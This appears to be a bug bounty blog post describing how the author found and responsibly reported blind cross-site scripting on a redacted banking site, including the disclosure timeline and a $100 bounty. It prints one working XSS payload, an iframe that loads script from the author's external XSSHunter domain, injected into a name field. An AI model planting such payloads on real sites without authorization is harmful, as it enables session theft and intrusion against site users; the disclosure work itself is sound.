Get Blind XSS within 5 Minutes — $100

Narayanan M
InfoSec Write-ups
Published in
2 min readNov 3, 2022

--

Hello Boss….

I am Narayanan M and this is my first blog on infosecwriteups. Today I will explain how I found Blind XSS on a banking site.

I found the redacted.com when I was looking for a bug bounty program. In the event of a valid submission, redacted.com will award a bounty in accordance with CVSS. So I decided to give it a try.

#What is Blind XSS
Blind XSS is a flavor of cross-site scripting (XSS), where the attacker “blindly” deploys a series of malicious payloads on web pages that are likely to save them to a persistent state (like in a database, or a log file).

Let’s Hunt…

I quickly copied my XSSHunter payload [<iframe/srcdoc=”<script/src=//narayananm.xss.ht></script>”>] and pasted on name field. After few minutes, I received the following mail.

Yes! Our payload is executed….
Tip: Always check all input field

Then I sent them a decent proof of concept. Next day, got a response from them to submit a video (POC) for better understanding. Again I create the video and sent it to them. A few days later, I received an email from them (the team has confirmed the fix. Can you check and update us?).

When I try to reproduce the issue, I can’t! That means the vulnerability has been successfully fixed.

Again a few days later I got an email from them and yes! It’s a bounty time.

Timeline:

Oct 6th — Vulnerability Reported
Oct 7th — Got a response from the team
Oct 17th — Vulnerability Fixed
Oct 27th — Retesting
Nov 3rd — Bounty Awarded ($100)

Twitter: https://twitter.com/itsnarayananm
Instagram:
https://www.instagram.com/rootx_narayanan/
LinkedIn:
https://www.linkedin.com/in/narayanan-m-836197199/

Peace…

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 GitHub Repos and tools, and 1 job alert for FREE!

--

--